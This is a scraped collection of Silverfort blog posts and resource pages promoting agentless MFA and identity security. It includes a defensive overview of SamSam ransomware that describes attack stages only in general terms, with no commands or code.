When attackers gain access to the network the first thing they are going to look for are privileged credentials. These credentials will allow them to access high value assets, move laterally in the network and install malicious software. What if one of your system administrators (that uses the PAM solution) falls victim to a Phishing Attack and their personal credentials are stolen? If those credentials allow access to the PAM solution, the attacker now has access to all the credentials, that have been conveniently stored in one central location. If an adversary gains access to the PAM solution he or she literally gains unlimited access to any sensitive system in the network. Adding Multi-Factor Authentication (MFA) provides a critical layer of security against the use of stolen user credentials. For that reason, PAM vendors highly recommend to always implement an MFA solution together with the PAM solution. So How Should I Protect my King? In a recent paper published by Deloitte, PAM and MFA are ranked as the 2 top identity initiatives for enterprises, with equal importance. These two important initiatives go hand in hand – putting all your sensitive passwords in one place doesn’t make much sense if attackers could easily access it with yet another password. Once the PAM solution is protected with MFA, even if an attacker gets stolen credentials of a system administrator, the attacker will not be able to access the PAM solution. This is because an additional factor of authentication (like a token or approval through a mobile application) is required from the user before access will be granted. When selecting and implementing an MFA solution, it is key to make sure that all the interfaces to the PAM solution are protected by MFA – not just the front door. This may be easier said than done. Let me explain: Most PAM solutions have several interfaces, including: 1. Web Portal Access - used for credential retrieval as well as administrative tasks 2. Proxy Access - used by system administrators to connect to systems using vaulted credentials (this is the preferred method by system administrators as it is more transparent). 3. API Access - used for automated tasks and service accounts The image above shows a basic high level architecture of a typical PAM solution. Here Comes the Queen To offer real protection, an MFA solution must provide a way to secure each interface into the PAM system. Without protecting all the interfaces, you are leaving a vulnerability in the system that will allow an attacker to get in. In many cases MFA is not implemented on all the PAM interfaces due to the complex integration requirements. In most cases MFA implementations require agents or proxies as well as changes to the network architecture. As PAM solutions are often delivered as a “black box” appliance, it’s not possible to install agents or make changes to the code. MFA solutions that are based on RADIUS are complex to implement and provide bad user experience due to that fact that One Time Passwords (OTP) are needed to be typed for each session that is opened (keep in mind that administrators might open countless sessions every day – so it becomes a nuisance). Silverfort’s agentless and proxy-less solution enables MFA on all PAM interfaces without the need to make complex changes to the system or the environment. Thanks to Silverfort’s agentless architecture it is also possible to protect all the interfaces to the PAM solution, including the web interface, GUI client, API and Proxies, without the need to perform MFA again and again for each session. When choosing an MFA vendor, it is also important to take into consideration the end user experience. IT administrators (that use privileged accounts) are usually very sensitive to changes in their workflow. They are also using the PAM solution multiple times in the span of an hour, so any inconvenience can have major impact on productivity. In most cases the users are storing the credentials for the PAM Solution in their browsers or connection managers to make their life easier. Other aspects that should be considered when choosing an MFA provider for a PAM solution: 1. Changes to current workflows 2. Ability to open multiple sessions at the same time without multiple MFA challenges 3. Easy-to-use MFA options such as soft tokens and mobile MFA apps 4. Ability to trigger MFA only once within a given time frame 5. Risk-based MFA that considers user behavior and context Silverfort’s risk-based authentication solution is flexible and enables it to provide a balance between security and user experience by allowing users to authenticate with MFA only once in a while, while keeping them secured all the time. This, together with the adaptive risk-based approach, makes it an ideal MFA solution for a PAM implementation. Final Words PAM is a critical security layer for organizations. PAM projects require a significant amount of time and recourses. Does it make sense to go through all the trouble to lock the door but leave the window open? MFA should be added to protect your PAM solution from day one. It should be considered an integral part of the PAM solution and be used to secure access through all routes and interfaces in order to protect the most important assets in your network. --- - Published: 2018-11-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/rethinking-mfa/ We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality is different. Adversaries are constantly trying to breach our systems and access our sensitive data, using our vulnerable authentication mechanisms against us. By Hed Kovetz, CEO and Co-Founder, Silverfort We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality is different. Adversaries are constantly trying to breach our systems and access our sensitive data, using our vulnerable authentication mechanisms against us. The problems of password authentication have been known for decades. The introduction of multi-factor authentication was the first major step towards strengthening authentication. Today, MFA is used by almost all enterprises at some capacity, yet it is still used for protecting only a small portion of our sensitive assets. This must make you wonder - if the problem is well known and the solution is available, why aren’t we using MFA to protect all systems? Why do we still rely on passwords so much? This is especially alarming considering that the use of compromised passwords in data breaches is growing from year to year instead of shrinking. Realizing this drove me, together with my co-founders Matan Fattal and Yaron Kassner, to start Silverfort. We met during our years at the Israeli cyber intelligence unit 8200, where we served in cybersecurity research, team leadership and group leadership roles, and got the opportunity to lead innovative research projects and the development of cutting-edge technologies. Each of us later worked for industry leading companies, until three years ago we joined forces again to establish Silverfort. Being innovators in the authentication space, we always thought that MFA will never be truly effective as long as it remains a point solution for protecting individual assets. Our approach is fundamentally different. For the first time, MFA will be designed to easily and seamlessly protect any organizational resource, no matter what it is, or where it is. Who moved my perimeter? Like many other security frameworks, MFA was designed under the perception of the perimeter – the clear border separating the “trusted” corporate network from the “untrusted” external network. In this simple reality, it was enough to enforce MFA at the “door” – the VPN Gateway, and maybe for a few remote resources. MFA solutions were therefore built to protect a specific point of access, and while their user-experience evolved over the years, this basic assumption did not. In recent years, network perimeters are gradually dissolving. IT revolutions such as cloud, IoT and BYOD are just some of the reasons why the physical boundaries of the corporate network are becoming irrelevant. This new era is challenging traditional security frameworks – where do I put my gatekeeper if there’s no clear gate? Where do I enforce MFA in a dynamic, hybrid environment where countless different devices and services are connecting to one another? That is why one infected endpoint is enough to take over an entire network using credential theft and lateral movement, as demonstrated in the 2017 NotPetya attack and many others. Integrating MFA system by system – a lost battle To better address the changing needs of their customers, MFA vendors have begun offering a long list of integrations, software agents, SDKs, proxies and other tools that enable MFA for more systems. Yet deploying them has become an endless task for security teams. With each solution offering integrations with specific systems, organizations are often forced to maintain several MFA solutions in order to protect their critical assets. This results in high costs, on-going investment of professional resources, and inconsistent user experience. It also limits the potential of risk-based adaptive authentication, because each MFA solution monitors only a portion of the network assets (for example only web applications), without any consolidated risk analysis that takes into account user behavior across all systems and environments. More importantly, many types of sensitive resources cannot be protected by current MFA solutions, for multiple reasons: In many cases, deploying software agents or making local modifications to certain systems isn’t feasible technically. This is the case with many proprietary and legacy systems, file shares (that are now targeted by ransomware), IoT devices and more. For many critical assets and 3rd party systems, technical modifications are refused by resource owners or prohibited by the manufacturers. This is common with production-critical servers and industrial control systems (ICS). In many organizations, the amount of assets and the dynamic nature of the environment make asset-by-asset integration impossible, such as in large enterprise networks and complex IaaS environments where countless different VM instances are being created or moved between environments on a daily basis, or in cases where business units are implementing systems that the IT has no idea about - a phenomenon called “shadow IT”. Rethinking MFA Looking at the challenges and limitations of traditional MFA solutions, it seems like the attempt to “stretch” traditional MFA solutions to fit today’s reality has reached its limits, and attackers are taking advantage of it. It’s time to go back to the drawing board and design a new breed of MFA solutions. We need to look at the network as a whole instead of integrating MFA into each individual asset. We need a way to seamlessly deliver strong authentication to systems that are currently considered “unprotectable” or that the IT department doesn’t even know about. We need a way to enable unified authentication policies, visibility, user experience and risk analysis across all systems and environments. By changing the way MFA is designed and implemented, Silverfort has opened a new chapter in enterprise authentication, enhancing the ability to trust users, manage secure access across all corporate systems and environments, respond to threats with real-time step-up authentication and enforce true risk-aware adaptive authentication that is not limited to specific systems. Three years into this journey, the Silverfort Next Generation Authentication Platform is now used by organizations all over the world to achieve exactly that. We help financial institutions enable MFA for their SWIFT servers, legacy financial applications and various servers where MFA is required by PCI DSS, SWIFT CSP, GDPR or the NY-DFS cybersecurity regulations. We help healthcare organizations enforce risk-based authentication across medical IoT devices, PACS servers and sensitive health records (EHRs). We help energy and manufacturing companies apply MFA not only in their IT environment, but also across their OT networks. We help organizations in all industries deliver holistic authentication policies, unified visibility and frictionless user experience across all systems and environments. Along the way we earned the support of great investors, leading partners, industry experts and most importantly – happy customers. But this is only the beginning – now it’s time to spread the word and reshape the authentication market. Hed Kovetz, CEO and Co-Founder, Silverfort Hed serves as Silverfort’s CEO and is one of the company’s Co-Founders. He brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. I look forward to continuing this journey and invite you to join us. --- - Published: 2018-09-04 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom-2/ SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice has charged two Iranian nationals with... By Yaron Kassner, CTO and Co Founder, Silverfort SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice has charged two Iranian nationals with computer hacking offenses in connection with the global SamSam ransomware outbreak. The alleged criminals are currently in Iran, out of the reach of US law enforcement, and I doubt the two suspects will travel to the U. S. to face questioning. I also doubt that these attacks will stop. So, it’s important to understand how this attack operates and implement some protective measures. Compromising the First Endpoint SamSam targets computers that are open to remote desktops from the internet. Finding such endpoints is super easy: free tools like Shodan can provide a list of such machines. As of today, there are 2,475,311 records of remote desktops open to the Internet in Shodan. The passwords to these desktops can be hacked with brute-force attacks or simply purchased on the dark web. The increased use of cloud environments puts organizations at risk, because a reckless admin could easily expose a machine in the cloud without protecting access to it from the internet. Moving Deeper into the Network SamSam doesn’t only encrypt the files of a single infected endpoint. Once the endpoint is compromised, SamSam utilizes stolen credentials and exploits vulnerabilities like EternalBlue to move laterally across the network. It uses “feed of the earth techniques” i. e. existing administration tools. This enables the ransomware to reach more valuable servers that hold more valuable data. Instead of holding one computer hostage, it takes over the entire network. Backups are often thought of as being a defense mechanism for ransomware prevention. However, the ability to move laterally in the network also enables SamSam to reach these backups and render them useless. A victim whose backups were encrypted, would have to pay the ransom, or lose the data. SamSam Mitigation Costs Exceed the Ransom Payment So far, the hackers made more than $6M in ransom. However, the costs to impacted organizations are much higher, because after paying the ransom and unlocking their files, they also need to make sure that the threat is completely removed from their networks. When the city of Atlanta was infected, they spent a total of $17M in efforts to resolve the incident, even though the ransom requested was much lower than that. In addition to the costs of the ransom, there is the obvious cost of the outage inflicted until the threat is removed. Perhaps that’s one of the reasons the malware is attacking so many healthcare providers – they can’t afford to go down. How to protect your organizations from SamSam Ransomware? Backup your data offline: If you’re counting on your backups to save you from ransomware, you need to make sure that the attacker won’t get to your backups as well. Keep in mind that saving your backups in the network, means that they are exposed to ransomware just as much as any other data in the network. Identify remote desktop servers that are exposed over the internet: Find a way to discover remote desktops that are exposed over the internet. An exposed remote desktop will be subject to a brute-force attack within hours of the exposure over the internet. So, a good way to identify internet-exposed remote desktops is to look for brute-force attacks. Silverfort can help you do that. Protect RDP Access by Enforcing Multi-Factor Authentication – if you have to expose a remote desktop to the internet, use a VPN or a bastion host. These prevent direct network access to the machine. But password-based authentication isn’t enough. You should also add MFA to validate that the credentials are indeed used by a legitimate user. Silverfort enables you to add MFA to these systems without any agents. Prevent lateral movement - Enforcing MFA on the use of administrative tools such as PSExec can effectively block such attacks. However, traditional MFA solutions can’t be implemented for such tools. Silverfort’s agentless MFA platforms can be easily extended to these tools as well. Protect access to your sensitive data – Enforce MFA for any access to sensitive resources, including databases, and file shares. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. To find out how Silverfort can protect your organization against SamSam and other threats, contact us today. --- - Published: 2018-07-04 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/rethinking-mfa-2/ We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality is different. Adversaries are constantly trying to breach our systems and access our sensitive data, using our vulnerable authentication mechanisms against us. By Hed Kovetz, CEO and Co-Founder, Silverfort We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality is different. Adversaries are constantly trying to breach our systems and access our sensitive data, using our vulnerable authentication mechanisms against us. The problems of password authentication have been known for decades. The introduction of multi-factor authentication was the first major step towards strengthening authentication. Today, MFA is used by almost all enterprises at some capacity, yet it is still used for protecting only a small portion of our sensitive assets. This must make you wonder - if the problem is well known and the solution is available, why aren’t we using MFA to protect all systems? Why do we still rely on passwords so much? This is especially alarming considering that the use of compromised passwords in data breaches is growing from year to year instead of shrinking. Realizing this drove me, together with my co-founders Matan Fattal and Yaron Kassner, to start Silverfort. We met during our years at the Israeli cyber intelligence unit 8200, where we served in cybersecurity research, team leadership and group leadership roles, and got the opportunity to lead innovative research projects and the development of cutting-edge technologies. Each of us later worked for industry leading companies, until three years ago we joined forces again to establish Silverfort. Being innovators in the authentication space, we always thought that MFA will never be truly effective as long as it remains a point solution for protecting individual assets. Our approach is fundamentally different. For the first time, MFA will be designed to easily and seamlessly protect any organizational resource, no matter what it is, or where it is. Who moved my perimeter? Like many other security frameworks, MFA was designed under the perception of the perimeter – the clear border separating the “trusted” corporate network from the “untrusted” external network. In this simple reality, it was enough to enforce MFA at the “door” – the VPN Gateway, and maybe for a few remote resources. MFA solutions were therefore built to protect a specific point of access, and while their user-experience evolved over the years, this basic assumption did not. In recent years, network perimeters are gradually dissolving. IT revolutions such as cloud, IoT and BYOD are just some of the reasons why the physical boundaries of the corporate network are becoming irrelevant. This new era is challenging traditional security frameworks – where do I put my gatekeeper if there’s no clear gate? Where do I enforce MFA in a dynamic, hybrid environment where countless different devices and services are connecting to one another? That is why one infected endpoint is enough to take over an entire network using credential theft and lateral movement, as demonstrated in the 2017 NotPetya attack and many others. Integrating MFA system by system – a lost battle To better address the changing needs of their customers, MFA vendors have begun offering a long list of integrations, software agents, SDKs, proxies and other tools that enable MFA for more systems. Yet deploying them has become an endless task for security teams. With each solution offering integrations with specific systems, organizations are often forced to maintain several MFA solutions in order to protect their critical assets. This results in high costs, on-going investment of professional resources, and inconsistent user experience. It also limits the potential of risk-based adaptive authentication, because each MFA solution monitors only a portion of the network assets (for example only web applications), without any consolidated risk analysis that takes into account user behavior across all systems and environments. More importantly, many types of sensitive resources cannot be protected by current MFA solutions, for multiple reasons: In many cases, deploying software agents or making local modifications to certain systems isn’t feasible technically. This is the case with many proprietary and legacy systems, file shares (that are now targeted by ransomware), IoT devices and more. For many critical assets and 3rd party systems, technical modifications are refused by resource owners or prohibited by the manufacturers. This is common with production-critical servers and industrial control systems (ICS). In many organizations, the amount of assets and the dynamic nature of the environment make asset-by-asset integration impossible, such as in large enterprise networks and complex IaaS environments where countless different VM instances are being created or moved between environments on a daily basis, or in cases where business units are implementing systems that the IT has no idea about - a phenomenon called “shadow IT”. Rethinking MFA Looking at the challenges and limitations of traditional MFA solutions, it seems like the attempt to “stretch” traditional MFA solutions to fit today’s reality has reached its limits, and attackers are taking advantage of it. It’s time to go back to the drawing board and design a new breed of MFA solutions. We need to look at the network as a whole instead of integrating MFA into each individual asset. We need a way to seamlessly deliver strong authentication to systems that are currently considered “unprotectable” or that the IT department doesn’t even know about. We need a way to enable unified authentication policies, visibility, user experience and risk analysis across all systems and environments. By changing the way MFA is designed and implemented, Silverfort has opened a new chapter in enterprise authentication, enhancing the ability to trust users, manage secure access across all corporate systems and environments, respond to threats with real-time step-up authentication and enforce true risk-aware adaptive authentication that is not limited to specific systems. Three years into this journey, the Silverfort Next Generation Authentication Platform is now used by organizations all over the world to achieve exactly that. We help financial institutions enable MFA for their SWIFT servers, legacy financial applications and various servers where MFA is required by PCI DSS, SWIFT CSP, GDPR or the NY-DFS cybersecurity regulations. We help healthcare organizations enforce risk-based authentication across medical IoT devices, PACS servers and sensitive health records (EHRs). We help energy and manufacturing companies apply MFA not only in their IT environment, but also across their OT networks. We help organizations in all industries deliver holistic authentication policies, unified visibility and frictionless user experience across all systems and environments. Along the way we earned the support of great investors, leading partners, industry experts and most importantly – happy customers. But this is only the beginning – now it’s time to spread the word and reshape the authentication market. Hed Kovetz, CEO and Co-Founder, Silverfort Hed serves as Silverfort’s CEO and is one of the company’s Co-Founders. He brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. I look forward to continuing this journey and invite you to join us. --- --- ## Resources - Published: 2025-08-26 - Modified: 2025-08-26 - URL: https://www.silverfort.com/resources/beyond-the-perimeter-modernizing-active-directory-protection-against-lateral-movement-and-privileged-access-abuse/ Identity is the new perimeter - and attackers know it. Breaches don’t end with the first compromise. Adversaries move laterally through Active Directory (AD), abusing “legitimate” protocols like NTLM, Kerberos, RDP, and SSH that most tools mistake for normal traffic. The problem: AD doesn’t natively enforce MFA on these protocols. Common hops - PsExec, PowerShell, WMI, even service-to-service authentications - go unchecked. Sprawling service accounts, stale credentials, and privilege creep create blind spots that attackers exploit to escalate access and jump between on-prem and cloud resources. Silverfort field research shows hybrid AD environments are full of undocumented accounts and unmanaged identities - prime targets for attackers. It’s clear: perimeter controls and bolt-on MFA aren’t enough. In this webinar, you’ll learn about topics, including: The state of identity-based attacks and why credentials remain the weapon of choice How lateral movement drives modern breaches Why common tools (vaults, legacy MFA, basic logging) leave gaps Additionally, Rob Larsen – Security Advisor at Silverfort will dive deep into topics such as: Identity Attack Paths – Real-world abuse of unmanaged service accounts, over-privileged credentials, and MFA blind spots AD Protocols & Lateral Movement – How NTLM, Kerberos, RDP, and SSH enable privilege escalation while evading defenses Securing Privileged & Service Accounts – Using analytics to uncover high-risk identities and enforce adaptive MFA Extending MFA Everywhere – Protecting legacy servers, Unix systems, and automated scripts with policy-based MFA --- - Published: 2025-08-26 - Modified: 2025-08-26 - URL: https://www.silverfort.com/resources/accelerating-passkey-adoption-with-microsoft-yubico-silverfort/ Strengthen your cyber defences with FIDO2 and passkeys Adopting phishing-resistant authentication methods with FIDO2 and passkeys is essential to safeguarding your organisation against credential-based attacks. But success depends not only on the strength of the technology – it’s also about ease of deployment and user adoption at scale. In this webinar, hear from experts from Microsoft, Yubico, and Silverfort as they share how you can: Accelerate secure onboarding of passkeys for users with new capabilities in Entra ID Deploy YubiKeys rapidly across large user populations Extend FIDO2 MFA to legacy systems and Windows AD environments Featured Speakers: Merill Fernando, Principal Product Manager, Microsoft Discover Microsoft’s new FIDO2 provisioning APIs (in public preview) in Entra ID and how they simplify large-scale deployment of security keys. Alex Wilson, Director of Solutions Engineering APJ, Yubico Learn how Yubico leverages these APIs to roll out passkeys on YubiKeys at speed and scale, improving security and user experience. Philip Richardson, Technology Alliances APJ, Silverfort See how Silverfort enables FIDO2 MFA for on-premises Windows AD authentications – protecting systems that were previously ‘unprotectable’. --- - Published: 2025-08-14 - Modified: 2025-08-14 - URL: https://www.silverfort.com/resources/swift-customer-securitycontrols-framework-cscf-v2025/ Complying with SWIFT's updated Customer Security Controls Framework (CSCF) is no small feat—especially when legacy systems and identity gaps get in the way. Silverfort helps you meet the new identity-focused requirements head-on. This solution brief explores how Silverfort enables financial institutions to meet CSCF v2025 controls with precision, speed, and clarity. From privileged access management to real-time threat detection, Silverfort delivers full visibility and enforcement across the authentication layer—covering every user, service account, and authentication protocol in your SWIFT-connected environment. With detailed control mappings to CSCF sections like 1. 2 (OS Privileged Account Control), 4. 2 (MFA), 5. 1 (Logical Access Control), 6. 5A (Intrusion Detection), and 7. 1 (Incident Response), Silverfort provides the technical and operational coverage you need—no system overhauls required. In this solution brief, you’ll learn how to: Enforce MFA and privilege restrictions across legacy applications, command-line tools, and modern systems. Detect identity threats in real time with behavior-based access monitoring and response. Streamline CSCF compliance with continuous monitoring, audit-ready reporting, and centralized policy management. --- - Published: 2025-08-13 - Modified: 2025-08-13 - URL: https://www.silverfort.com/resources/identity-security-at-a-crossroads-esg-research/ Workforce identity security is in a state of flux, with changing enterprise infrastructure, an expanding application portfolio to integrate, and sprawling cloud deployments that are exposing unsolved problems, inefficient processes, and fragmented solutions. Analyst firm Enterprise Strategy Group (ESG) surveyed 370 IT and cybersecurity decision makers to identify the pain points that are top-of-mind, as well as to uncover the strategies teams plan to implement to tackle growing identity security concerns.   Key findings include:  67% of teams are concerned about non-human identity (NHI) Security  52% of identity security leaders are concerned about data privacy as a result of AI agent adoption  46% of organizations use multiple solutions for MFA  35% of organizations manage 1,000+ business applications  If you lead identity security initiatives for your organization, get the report today to see where your peers are focusing their attention in 2025 and beyond. --- - Published: 2025-08-07 - Modified: 2025-08-07 - URL: https://www.silverfort.com/resources/closing-identity-security-gaps-how-ping-identity-and-silverfort-protect-every-access-point/ Scroll down to watch the webinar, or head over to YouTube. Enterprises rely on Ping Identity to manage and secure user access across a wide range of systems. But even with strong IAM in place, critical blind spots remain: legacy systems that don’t support modern security controls, command-line access that bypasses MFA, and non-human identities like Active Directory service accounts that silently operate in the background—often without visibility or control. That’s where Silverfort comes in. Join us for an eye-opening session where we’ll show how Ping Identity and Silverfort work better together to deliver comprehensive identity security across your entire hybrid environment—including those traditionally hard-to-secure systems and identities. In this webinar, you'll learn how this partnership enables you to: Extend Ping’s policy-based access control and MFA to any resource, including legacy apps, file shares, and infrastructure access over RDP or SSH. Gain full visibility into all authentication activity—for both human and non-human identities—across your hybrid network. Discover and secure service accounts and other non-human identities that attackers often exploit to move laterally undetected. Apply consistent, centralized policies to systems and tools that previously operated in silos. We’ll walk through real-world use cases, live demos, and practical examples that show how leading organizations are using Silverfort and Ping Identity to close security gaps and protect what matters most: every identity in the enterprise. https://youtu. be/PWTGGZ2BJJI --- - Published: 2025-08-05 - Modified: 2025-08-07 - URL: https://www.silverfort.com/resources/cloud-non-human-identity-nhi-security/ Get control of cloud NHIs before they become a problem Non-human identities are powering your cloud, but who’s managing them? As organizations scale in the cloud, non-human identities (NHIs) like service accounts and machine credentials are exploding in volume—and most aren’t getting the attention they need. These identities often fly under the radar, created by different teams, over-permissioned, unmonitored, and rarely rotated. That makes them a prime target for attackers—and a growing blind spot in your security stack. This solution brief walks you through how Silverfort helps uncover, assess, and secure NHIs across identity providers, cloud infrastructure, and SaaS platforms. From discovery to remediation, Silverfort delivers the full picture of every machine identity in your environment—plus the tools to reduce risk fast. In this solution brief, you’ll learn how to: Discover and classify all NHIs across platforms like Okta, Entra, AWS, Azure, GCP, GitHub, and more. Visualize and investigate each identity’s privileges, credentials, usage patterns, and ownership. Prioritize and remediate exposures with clear, actionable recommendations to improve security posture. Get the PDF to see how Silverfort helps you bring visibility, control, and confidence to your cloud NHI strategy. --- - Published: 2025-08-01 - Modified: 2025-08-01 - URL: https://www.silverfort.com/resources/silverfort-and-netskopes-risk-intelligence-integration/ Silverfort and Netskope have integrated to help organizations enforce smarter, risk-based access decisions across cloud and hybrid environments. The integration allows identity and network risk signals to flow between the two platforms, enhancing visibility and control. This solution brief introduces the Silverfort-Netskope integration, built to close security gaps between identity and network access. Whether you choose to send risk from Silverfort into Netskope or vice versa, the integration allows each platform to enhance enforcement policies based on shared, real-time risk context. By feeding identity insights into Netskope’s User Confidence Index (UCI), or ingesting web access risk from Netskope into Silverfort, organizations can dynamically adjust access controls, reduce exposure to threats, and unify visibility across hybrid environments. It’s the next step toward risk-adaptive Zero Trust. In this PDF, you’ll learn how to: Exchange identity and network risk signals between Silverfort and Netskope to inform enforcement decisions. Reduce exposure to threats like compromised credentials by adjusting access in real time. Unify policy enforcement across cloud apps, web traffic, and hybrid identity systems. Get the solution brief to learn how Silverfort and Netskope are reshaping adaptive security—one API call at a time. --- - Published: 2025-07-30 - Modified: 2025-07-29 - URL: https://www.silverfort.com/resources/rfp-checklist/ No email address required! Most organizations operate with a hybrid, fragmented IAM infrastructure – making it a complex task for identity and security teams to enforce consistent policies, maintain visibility into risks like lateral movement and privilege escalation, or respond to threats in real-time.   To make sense of the identity security capabilities that truly matter, get the Identity Security RFP Checklist. Here’s the value you’ll walk away with:  Specific questions to ask when evaluating vendors across six key capabilities Downloadable templates that you can customize for your team Clarity on what matters to your particular team when searching for solutions to timely concerns Make identity security your strategic advantage – download the guide now. --- - Published: 2025-07-28 - Modified: 2025-07-28 - URL: https://www.silverfort.com/resources/silverfort-crowdstrike-siem-for-risk-and-incident-monitoring/ Streamline identity threat detection across your entire security stack Traditional IAM tools leave gaps. This solution brief shows how Silverfort and CrowdStrike Falcon® Next-Gen SIEM fill them by bringing deep identity threat data into your SIEM environment in real time. SOC teams gain a complete picture of both endpoint and identity-based risks, all within a single console. Silverfort continuously streams high-fidelity alerts—like suspicious logins, MFA fatigue, and credential misuse—into CrowdStrike’s SIEM platform. These signals are automatically correlated with endpoint behavior and network telemetry to enrich detection, reduce alert fatigue, and accelerate investigation timelines. In this PDF, you’ll learn how to: Detect identity-based threats faster with real-time alerts for brute force, lateral movement, and more. Correlate identity risk with endpoint and network data for deeper threat context. Enhance SOC efficiency by embedding identity risk into existing CrowdStrike workflows. Download the PDF to discover how Silverfort and CrowdStrike bring clarity and speed to identity threat detection—right inside your SIEM. --- - Published: 2025-07-28 - Modified: 2025-07-28 - URL: https://www.silverfort.com/resources/silverfort-crowdstrike-falcon-edr/ Extend detection and response from endpoints to identity This solution brief reveals how Silverfort and CrowdStrike Falcon Insight work together to create a real-time feedback loop between user behavior and device telemetry, delivering smarter threat detection and faster incident response. Silverfort enriches Falcon with risk scores tied to users and devices, while Falcon shares endpoint alerts to inform Silverfort’s dynamic access policies. The result? Your SOC can detect and stop attackers before they pivot across systems or escalate privileges—all with greater context and less noise. In this PDF, you’ll learn how to: Correlate authentication risk with endpoint activity to investigate threats in full context. Prevent lateral movement by enforcing real-time access controls on high-risk users. Hunt smarter by linking login anomalies with malicious process behavior across devices. Download the PDF now to see how Falcon and Silverfort together make XDR smarter, faster, and identity-aware. --- - Published: 2025-07-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/resources/identity-first-incident-response-with-silverfort/ Compromised identities are the entry point for nearly every cyberattack—and time is your most precious asset when responding. Silverfort’s Identity-First Incident Response offers a groundbreaking approach to detecting and containing identity-based threats in Active Directory (AD) environments with unmatched speed and precision. This solution brief outlines how security and incident response teams can shift from reactive to proactive with identity at the center of their strategy. Learn how Silverfort’s patented Runtime Access Protection (RAP) technology enables immediate enforcement of MFA and access-blocking policies across all AD authentications—without infrastructure changes. You’ll discover: How to detect and lock down compromised accounts automatically within minutes Why lateral movement becomes trivially traceable with identity-based telemetry How to map and remediate identity weaknesses post-incident to prevent repeat attacks A step-by-step IR process drill down that moves from containment to hardening with zero guesswork Whether you’re managing a sprawling multi-domain environment or responding to an active threat, this guide will show you how to accelerate IR workflows, reduce attack dwell time, and restore operations securely—with minimal disruption. Get the PDF now to learn how to transform your incident response strategy by putting identity first. --- - Published: 2025-07-21 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-ping-identity-integration/ What if PingID could protect every corner of your environment—from SaaS apps to the most legacy on-prem servers? Now it can. This solution brief introduces the powerful Silverfort + Ping Identity integration, which enables organizations to apply PingID’s robust MFA to all access points—cloud and on-prem alike. That includes legacy applications, command-line tools, RDP sessions, file shares, and more. You’ll see how Silverfort’s real-time risk engine evaluates every authentication request, whether from a user, admin, or service account, and determines whether step-up authentication is needed. It’s MFA where it matters most, triggered only when risk is detected, so users aren’t overwhelmed and security isn’t compromised. If you’re looking to close gaps in your zero trust architecture and protect resources that Ping couldn’t reach before, this guide is for you. In this PDF, you’ll learn how to: Extend PingID MFA protection to previously unreachable resources like legacy systems, infrastructure, and internal admin tools. Apply advanced risk-based policies that evaluate user context before requiring MFA, reducing friction and fatigue. Unify identity security across cloud and on-prem environments for consistent, real-time protection. Download the solution brief now to discover how Silverfort and Ping Identity work better together to secure every authentication, everywhere. --- - Published: 2025-07-10 - Modified: 2025-07-10 - URL: https://www.silverfort.com/resources/accelerez-votre-mise-en-conformite-nis2-avec-silverfort/ Selon certaines estimations, plus de 15 000 organisations seront concernées par la transposition française de NIS 2. Les "entités essentielles" et "importantes" doivent donc préparer une feuille de route de mise en conformité afin d’accroitre leur résilience cyber, couvrant parmi tant d'autres sujets la sécurité de leurs annuaires, la gestion des comptes et des accès, et la maîtrise de l'administration. Rejoignez-nous pour ce webinaire pour découvrir comment Silverfort pourra vous aider à atteindre ces objectifs de manière efficiente. --- - Published: 2025-07-01 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/introduction-to-identity-protection-in-the-zero-trust-era-japanese/ ゼロトラストの本質とは何か? そして、なぜ今「アイデンティティ」が最重要なのか? 本セミナーでは、Silverfortの全体像を通じて、現代のサイバーセキュリティ戦略における課題とその解決策をわかりやすくご紹介します。 目次(Agenda) Silverfortのご紹介/Silverfortの全体像 (15分) 青山裕宣 : Country Lead, Silverfort Japan Silverfort機能紹介・デモ(30分)佐藤公理:Senior Sales Engineer, CISSP CISA CISM 質疑応答・個別相談(15分) --- - Published: 2025-07-01 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/silverfort-cortex-xsoar/ Real-time identity threat response, now fully automated Traditional IAM tools weren’t built to detect identity threats like lateral movement or account takeover—and that leaves security teams exposed. Enter the Silverfort + Cortex XSOAR integration. This solution brief introduces how Silverfort’s real-time identity threat detection pairs perfectly with Cortex XSOAR’s automation and orchestration to deliver a smarter, faster, and more efficient incident response process. You’ll see how identity-based intelligence is dynamically ingested into XSOAR playbooks, allowing you to take immediate action with no delays or bottlenecks. In this PDF, you’ll learn how to: Detect and respond to threats instantly by unifying identity risk with automated SOAR workflows. Trigger adaptive enforcement like MFA or access blocks based on live risk signals. Streamline incident handling with identity-aware playbooks that reduce manual work. Download the PDF to learn how to close the identity detection gap—and automate your response like never before. --- - Published: 2025-07-01 